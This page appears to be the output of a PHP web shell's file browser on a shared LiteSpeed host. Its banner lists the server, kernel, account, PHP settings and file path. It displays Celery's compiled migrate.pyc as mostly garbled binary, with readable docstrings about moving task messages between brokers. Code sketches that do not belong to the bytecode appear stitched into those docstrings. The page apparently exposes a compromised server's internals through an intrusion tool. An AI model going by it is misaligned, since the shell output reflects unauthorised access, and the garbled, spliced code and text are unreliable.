Yohohohohohooho | Sanrei Aya
Server : LiteSpeed
System : Linux barito.iixcp.rumahweb.net 5.14.0-611.49.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Apr 21 16:39:08 EDT 2026 x86_64
User : elvh3918 ( 1528)
PHP Version : 8.2.31
Disable Function : mail
Directory :  /usr/local/lib/python3.9/site-packages/celery/contrib/__pycache__/

Current File : //usr/local/lib/python3.9/site-packages/celery/contrib/__pycache__/migrate.cpython-39.pyc
a

��Sh8�@sddZddlZddlmZddlmZmZddlmZm	Z	ddl
mZddlm
Z
ddlmZdd	lmZdd
lmZdZdZGd
d�de�ZGdd�d�Zd4dd�Zd5dd�Zdd�Zeddfdd�Zdd�Zd6dd�Zdd�Zdd �Z d!d"�Z!d#d$�Z"Gd%d&�d&�Z#d7d)d*�Z$d+d,�Z%d-d.�Z&d/d0�Z'd1d2�Z(eeed3�Z)ee%ed3�Z*ee&ed3�Z+ee'ed3�Z,dS)8z,Message migration tools (Broker <-> Broker).�N)�partial)�cycle�islice)�Queue�	eventloop)�
maybe_declare)�ensure_bytes)�app_or_default)�
worker_direct)�str_to_list)�
StopFiltering�State�	republish�migrate_task�
migrate_tasks�move�
task_id_eq�
task_id_in�start_filter�move_task_by_id�
move_by_idmap�move_by_taskmap�move_direct�move_direct_by_idzGMoving task {state.filtered}/{state.strtotal}: {body[task]}[{body[id]}]c@seZdZdZdS)rz*Semi-predicate used to signal filter stop.N)�__name__�
__module__�__qualname__�__doc__�rr�@/usr/local/lib/python3.9/site-packages/celery/contrib/migrate.pyrsrc@s0eZdZdZdZdZdZedd��Zdd�Z	dS)r
zMigration progress state.rcCs|js
dSt|j�S)N�?)�	total_apx�str��selfrrr�strtotal&szState.strtotalcCs$|jrd|j��S|j�d|j��S)N�^�/)�filtered�countr%r#rrr�__repr__,szState.__repr__N)
rrrrr)r(r!�propertyr%r*rrrrr
s
r
c
Cs�|sgd�}t|j�}|j|j|j}}}|dur<|dn|}|durP|dn|}|j|j}	}
|�dd�}|�dd�}|dur�t|�nd}|D]}
|�|
d�q�|j	t|�f|||||	|
|d�|��dS)zRepublish message.)Zapplication_headers�content_type�content_encoding�headersN�exchange�routing_key�compression�
expiration)r/r0r1r.r,r-r2)
r�body�
delivery_infor.�
propertiesr,r-�pop�float�publish)�producer�messager/r0Zremove_propsr3�infor.�props�ctype�encr1r2�keyrrrr2s*
�
��rcCs>|j}|durin|}t|||�|d�|�|d�d�dS)zMigrate single task message.Nr/r0�r/r0)r4r�get)r9Zbody_r:�queuesr;rrrrPs�rcs��fdd�}|S)Ncs�r|d�vrdS�||�S�N�taskr�r3r:��callback�tasksrrr([sz!filter_callback.<locals>.filteredr)rGrHr(rrFr�filter_callbackYsrIcsVt|�}t���|jj|dd��t|��d�}��fdd�}t|||f�|d�|��S)z)Migrate tasks from one broker to another.F)Zauto_declare�rBcsh|�j�}��|j|j�|_|j|jkr:��|j|j�|_|jj|jkr\��|j|j�|j_|��dS�N)�channelrA�namer0r/Zdeclare)�queueZ	new_queue�r9rBrr�on_declare_queueks
�z'migrate_tasks.<locals>.on_declare_queue)rBrP)r	�prepare_queues�amqp�Producerrr)�source�destZmigrate�apprB�kwargsrPrrOrrcs
��rcCst|t�r|jj|S|SrK)�
isinstancer"rRrB)rV�qrrr�_maybe_queueys
rZc	
s�t����fdd�|pgD�p d}
�j|dd��V��j����t�����������	f	dd�}t��|fd|
i|	��Wd�S1s�0YdS)	aG	Find tasks by filtering them and move the tasks to a new queue.

    Arguments:
        predicate (Callable): Filter function used to decide the messages
            to move.  Must accept the standard signature of ``(body, message)``
            used by Kombu consumer callbacks.  If the predicate wants the
            message to be moved it must return either:

                1) a tuple of ``(exchange, routing_key)``, or

                2) a :class:`~kombu.entity.Queue` instance, or

                3) any other true value means the specified
                    ``exchange`` and ``routing_key`` arguments will be used.
        connection (kombu.Connection): Custom connection to use.
        source (List[Union[str, kombu.Queue]]): Optional list of source
            queues to use instead of the default (queues
            in :setting:`task_queues`).  This list can also contain
            :class:`~kombu.entity.Queue` instances.
        exchange (str, kombu.Exchange): Default destination exchange.
        routing_key (str): Default destination routing key.
        limit (int): Limit number of messages to filter.
        callback (Callable): Callback called after message moved,
            with signature ``(state, body, message)``.
        transform (Callable): Optional function to transform the return
            value (destination) of the filter function.

    Also supports the same keyword arguments as :func:`start_filter`.

    To demonstrate, the :func:`move_task_by_id` operation can be implemented
    like this:

    .. code-block:: python

        def is_wanted_task(body, message):
            if body['id'] == wanted_id:
                return Queue('foo', exchange=Exchange('foo'),
                             routing_key='foo')

        move(is_wanted_task)

    or with a transform:

    .. code-block:: python

        def transform(value):
            if isinstance(value, str):
                return Queue(value, Exchange(value), value)
            return value

        move(is_wanted_task, transform=transform)

    Note:
        The predicate may also return a tuple of ``(exchange, routing_key)``
        to specify the destination to which the task should be moved,
        or a :class:`~kombu.entity.Queue` instance.
        Any other true value means that the task will be moved to the
        default exchange/routing_key.
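
    The three kinds of predicate return value described above can be
    illustrated with a small, self-contained sketch.  ``FakeQueue`` and
    ``resolve_destination`` are hypothetical names introduced only for this
    illustration (the stand-in avoids importing Kombu), and the logic is a
    simplified approximation rather than the library's implementation.

```python
from collections import namedtuple

# Hypothetical stand-in for kombu.Queue, used only so the sketch runs
# without a broker library installed.
FakeQueue = namedtuple("FakeQueue", ["name", "exchange", "routing_key"])


def resolve_destination(ret, default_exchange, default_routing_key):
    """Map a predicate's return value to an (exchange, routing_key) pair."""
    if not ret:
        # A false value means the message is not moved at all.
        return None
    if isinstance(ret, FakeQueue):
        # Case 2: a queue object carries its own exchange and routing key.
        return ret.exchange, ret.routing_key
    if isinstance(ret, tuple) and len(ret) == 2:
        # Case 1: an explicit (exchange, routing_key) tuple.
        return ret
    # Case 3: any other true value falls back to the defaults.
    return default_exchange, default_routing_key
```

    Checking the queue case before the tuple case matters in this sketch
    only because the stand-in is itself a named tuple.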
    csg|]}t�|��qSr)rZ)�.0rN)rVrr�
<listcomp>��zmove.<locals>.<listcomp>NF)�poolcs��||�}|r��r�|�}t|t�rBt|�j�|jj|j}}nt|���\}}t�|||d�|�	��j
d7_
�r���||��r��j
�kr�t��dS)Nr@�)rXrrZdefault_channelr/rMr0�expand_destr�ackr(r)r3r:�ret�ex�rk)	rG�connr/�limit�	predicater9r0�state�	transformrr�on_task�s"

�zmove.<locals>.on_task�consume_from)r	Zconnection_or_acquirerRrSr
r)rg�
connectionr/r0rTrVrGrfrirWrBrjr)
rVrGrer/rfrgr9r0rhrirrs>rc	Cs6z|\}}Wn ttfy,||}}Yn0||fSrK)�	TypeError�
ValueError)rbr/r0rcrdrrrr`�s
r`cCs|d|kS)z'Return true if task id equals task_id'.�idr)�task_idr3r:rrrr�srcCs|d|vS)z-Return true if task id is member of set ids'.ror)�idsr3r:rrrr�srcCs@t|t�r|�d�}t|t�r0tdd�|D��}|dur<i}|S)N�,css(|] }ttt|�d��dd��VqdS)�:N�)�tuplerr�split�r[rYrrr�	<genexpr>�s�z!prepare_queues.<locals>.<genexpr>)rXr"rv�list�dictrJrrrrQ�s


�rQc@sFeZdZddd�Zdd�Zdd	�Zd
d�Zdd
�Zdd�Zdd�Z	dS)�FiltererN��?Fcs�|�_|�_|�_|�_|�_|�_tt|�p0g��_t	|��_
|	�_|
�_|�_
�fdd�|pht�j
�D��_|
pxt��_|�_dS)Ncsg|]}t�j|��qSr)rZrVrwr#rrr\	s�z%Filterer.__init__.<locals>.<listcomp>)rVre�filterrf�timeout�ack_messages�setrrHrQrBrG�foreverrPryrkr
rh�accept)r$rVrer}rfr~rrHrBrGr�rPrkrhr�rWrr#r�__init__�s 

�zFilterer.__init__c	Csx|�|����Tzt|j|j|jd�D]}q&Wn$tjyBYntyRYn0Wd�n1sh0Y|jS)N)r~Zignore_timeouts)	�prepare_consumer�create_consumerrrer~r��socketrrh)r$�_rrr�starts�
$zFilterer.startcCs.|jjd7_|jr*|jj|jkr*t��dS)Nr_)rhr)rfr�r$r3r:rrr�update_stateszFilterer.update_statecCs|��dSrK)rar�rrr�ack_message#szFilterer.ack_messagecCs|jjj|j|j|jd�S)N)rBr�)rVrRZTaskConsumerrerkr�r#rrrr�&s
�zFilterer.create_consumercCs�|j}|j}|j}|jr<t||j�}t||j�}t||j�}|�|�|�|�|jrb|�|j�|jdur�t|j|j	�}|jr�t||j�}|�|�|�
|�|SrK)r}r�r�rHrIZregister_callbackrrGrrh�declare_queues)r$�consumerr}r�r�rGrrrr�-s$




zFilterer.prepare_consumerc	Cs�|jD]t}|jr|j|jvrq|jdur2|�|�z0||j�jdd�\}}}|r`|jj|7_Wq|jjyxYq0qdS)NT)Zpassive)	rBrMrPrLZ
queue_declarerhr!reZchannel_errors)r$r�rNr�Zmcountrrrr�As


��zFilterer.declare_queues)Nr|FNNNFNNNN)
rrrr�r�r�r�r�r�r�rrrrr{�s�
r{r|FcKs0t|||f|||||||	|
|||
d�|����S)z
Filter tasks.)rfr~rrHrBrGr�rPrkrhr�)r{r�)rVrer}rfr~rrHrBrGr�rPrkrhr�rWrrrrQs"��
�rcKst||ifi|��S)a�Find a task by id and move it to another queue.

    Arguments:
        task_id (str): Id of task to find and move.
        dest (str, kombu.Queue): Destination queue.
        transform (Callable): Optional function to transform the return
            value (destination) of the filter function.
        **kwargs (Any): Also supports the same keyword
            arguments as :func:`move`.
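
    As a rough sketch, matching a single task by id amounts to binding the
    wanted id into a predicate with the ``(body, message)`` signature.  The
    helper below mirrors ``task_id_eq`` from this module; the id ``abc-123``
    and the message bodies are made-up sample data.

```python
from functools import partial


def task_id_eq(task_id, body, message):
    """Return True if the message body carries the wanted task id."""
    return body["id"] == task_id


# Bind the id so the result has the (body, message) predicate signature.
is_wanted = partial(task_id_eq, "abc-123")

# Made-up message bodies; the message argument is unused by this predicate.
bodies = [
    {"id": "abc-123", "task": "tasks.add"},
    {"id": "def-456", "task": "tasks.mul"},
]
matches = [body for body in bodies if is_wanted(body, None)]
```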
    )r)rprUrWrrrrfsrcs$�fdd�}t|fdt��i|��S)a�Move tasks by matching from a ``task_id: queue`` mapping.

    Where ``queue`` is a queue to move the task to.

    Example:
        >>> move_by_idmap({
        ...     '5bee6e82-f4ac-468e-bd3d-13e8600250bc': Queue('name'),
        ...     'ada8652d-aef3-466b-abd2-becdaf1b82b3': Queue('name'),
        ...     '3a2b140d-7db1-41ba-ac90-c36a0ef4ab1f': Queue('name')},
        ...   queues=['hipri'])
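
    The lookup behind such a mapping can be sketched without a broker.
    Assumptions: the task id is read from the message's ``correlation_id``
    property, plain strings stand in for ``Queue`` objects, and
    ``fake_message`` is a hypothetical helper that builds a stand-in for a
    real message.

```python
from types import SimpleNamespace

# Destination names stand in for Queue objects in this sketch.
idmap = {
    "5bee6e82-f4ac-468e-bd3d-13e8600250bc": "hipri",
    "ada8652d-aef3-466b-abd2-becdaf1b82b3": "lopri",
}


def task_id_in_map(body, message):
    """Return the destination for this message, or None to leave it alone."""
    return idmap.get(message.properties["correlation_id"])


def fake_message(task_id):
    # Hypothetical stand-in exposing only the attribute the predicate reads.
    return SimpleNamespace(properties={"correlation_id": task_id})


hit = task_id_in_map({}, fake_message("5bee6e82-f4ac-468e-bd3d-13e8600250bc"))
miss = task_id_in_map({}, fake_message("not-in-the-map"))
```

    Because each id is expected to match at most once, the number of
    entries in the mapping is a natural upper bound on how many messages
    need to be moved.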
    cs��|jd�S)NZcorrelation_id)rAr5rE��maprr�task_id_in_map�sz%move_by_idmap.<locals>.task_id_in_maprf)r�len)r�rWr�rr�rrtsrcs�fdd�}t|fi|��S)aMove tasks by matching from a ``task_name: queue`` mapping.

    ``queue`` is the queue to move the task to.

    Example:
        >>> move_by_taskmap({
        ...     'tasks.add': Queue('name'),
        ...     'tasks.mul': Queue('name'),
        ... })
    cs��|d�SrC)rArEr�rr�task_name_in_map�sz)move_by_taskmap.<locals>.task_name_in_map)r)r�rWr�rr�rr�srcKsttjf||d�|���dS)N)rhr3)�print�MOVING_PROGRESS_FMT�format)rhr3r:rWrrr�
filter_status�sr�)ri)NNN)N)NNNNNNNN)Nr|FNNNFNNNN)-rr��	functoolsr�	itertoolsrrZkomburrZkombu.commonrZkombu.utils.encodingrZ
celery.appr	Zcelery.utils.nodenamesr
Zcelery.utils.textr�__all__r��	Exceptionrr
rrrIrrZrr`rrrQr{rrrrr�rrZmove_direct_by_idmapZmove_direct_by_taskmaprrrr�<module>sV�

	
�
�
[Z�

